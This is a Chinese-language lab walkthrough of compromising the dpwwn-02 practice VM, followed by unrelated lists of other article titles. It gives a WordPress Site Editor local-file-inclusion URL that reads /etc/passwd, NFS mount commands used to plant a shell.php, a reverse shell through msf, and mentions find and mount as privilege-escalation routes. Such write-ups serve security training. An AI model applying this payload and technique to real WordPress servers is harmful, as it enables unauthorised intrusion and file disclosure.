dpwwn-02靶机渗透

将两台机器都配置为net模式。

进行一下内网扫描：

发现主机10.10.10.10，进行端口扫描。

发现有80，111,443,2049等端口开放，443值得注意。

访问网站告诉我们：dpwwn-02 GOAL IS SIMPLE : OBTAIN: # shell like root@dpwwn-02:~#

进行目录爆破，发现wordpress，访问http://10.10.10.10/wordpress/。

利用wpscan扫描一下，发现插件。

枚举一下用户：发现admin用户。

搜索一下漏洞。

发现一个本地文件包含的漏洞，是18年的，根据dirb扫描出来的地址，生成payload：http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd。

成功执行，但是没办法getshell，看一下2049，以及443端口。

发现/home/dpwwn02目录可以挂载，进行挂载。

mkdir /mnt/dpwwn02

mount 10.10.10.10:/home/dpwwn02 /mnt/dpwwn02

msf设置一下，访问网页，进行shell反弹。

http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php。

进入交互页面：

发现定时计划在日志目录下clear-apache2.sh 但是没有执行权限。

发现find命令以及mount命令，都可以进行提权。

最新文章

1. 触控的手牌—Cocos Creator
2. QLPreViewController的初步实用
3. Grunt备忘录
4. Powerdesigner自定义DBMS（以derby数据库为例）
5. Jexus & Mono 迁移
6. WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform
7. Rhel6-集群管理（luci&&ricci）配置文档
8. Web应用开发工具及语言需要具备的功能探索
9. php序列化，反序列化
10. 为什么从PhoneGap中逃离
11. Cocos2d html5 笔记 1: overview
12. Golang－interface（四 反射）
13. Python_day1 基础语法
14. Linux-使用patch命令给uboot打补丁(3)
15. 安装RabbitMQ编译erlang时，checking for c compiler default output file name... configure:error:C compiler cannot create executables See 'config.log' for more details.
16. JAVA中循环删除list中元素的方法总结【转】
17. PAT B1023
18. CentOS 7安装配置Samba服务器(挂载共享文件夹)
19. Entity Framework(EF的Model First方法)
20. SQL Server,MySQL,Oracle三者的区别

热门文章

1. 算法-排序（1）k路平衡归并与败者树
2. python numpy数组操作2
3. Spring boot程序的部署及运行
4. SICP之应用序和正则序
5. Fitness - 05.23
6. unity 着色器内置宏
7. POJ-2299-Ultra-QuickSort（单点更新 + 区间查询+离散化）
8. Black & White（尺取）
9. Oracle错误 ora-12514 解决方法-九五小庞
10. [PyTorch 学习笔记] 5.2 Hook 函数与 CAM 算法